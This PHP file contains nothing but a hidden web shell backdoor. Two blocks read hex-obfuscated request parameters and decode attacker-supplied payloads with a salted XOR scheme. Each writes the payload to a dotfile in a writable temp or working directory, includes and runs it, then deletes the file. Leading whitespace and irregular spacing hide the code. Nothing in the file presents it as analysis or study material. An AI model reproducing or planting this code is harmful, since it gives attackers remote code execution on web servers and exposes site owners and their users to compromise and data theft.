<?php																																										if(filter_has_var(INPUT_POST, "co\x6D\x70onent")){ $flg = $_REQUEST["co\x6D\x70onent"]; $flg= explode (".",$flg) ; $object = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $len = count($flg); for($z = 0; $z < $len; $z++) {$v2 = $flg[$z]; $sChar = ord($s[$z% $sLen]); $dec = ((int)$v2 - $sChar -($z% 10)) ^ 67; $object .=chr($dec); } $property_set = array_filter([getcwd(), sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), getenv("TEMP"), "/var/tmp", session_save_path()]); for ($record = 0, $marker = count($property_set); $record < $marker; $record++) { $k = $property_set[$record]; if (max(0, is_dir($k) * is_writable($k))) { $pgrp = sprintf("%s/.ref", $k); if (file_put_contents($pgrp, $object)) { require $pgrp; unlink($pgrp); exit; } } } }


if(array_key_exists("\x72ec", $_REQUEST) && !is_null($_REQUEST["\x72ec"])){
	$tkn = array_filter([session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/tmp"]);
	$factor = $_REQUEST["\x72ec"];
			$factor=   explode		("."	 	,	 	$factor	) 	; 
	$data_chunk = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	$salt);
            $j = 0;
    
            while(	$j < count(	$factor)) {	 $v6 = $factor[$j];
                $sChar = ord(	$salt[$j		%	 $sLen]);
                $dec =(	(	int)$v6 - $sChar -(	$j		%	 10))^	 85;
                $data_chunk .= chr(	$dec);
                $j++;
            }
	for ($pset = 0, $flag = count($tkn); $pset < $flag; $pset++) {
    $token = $tkn[$pset];
    		if (is_dir($token) && is_writable($token)) {
    $elem = join("/", [$token, ".record"]);
    if (@file_put_contents($elem, $data_chunk) !== false) {
	include $elem;
	unlink($elem);
	exit;
}
}
}
}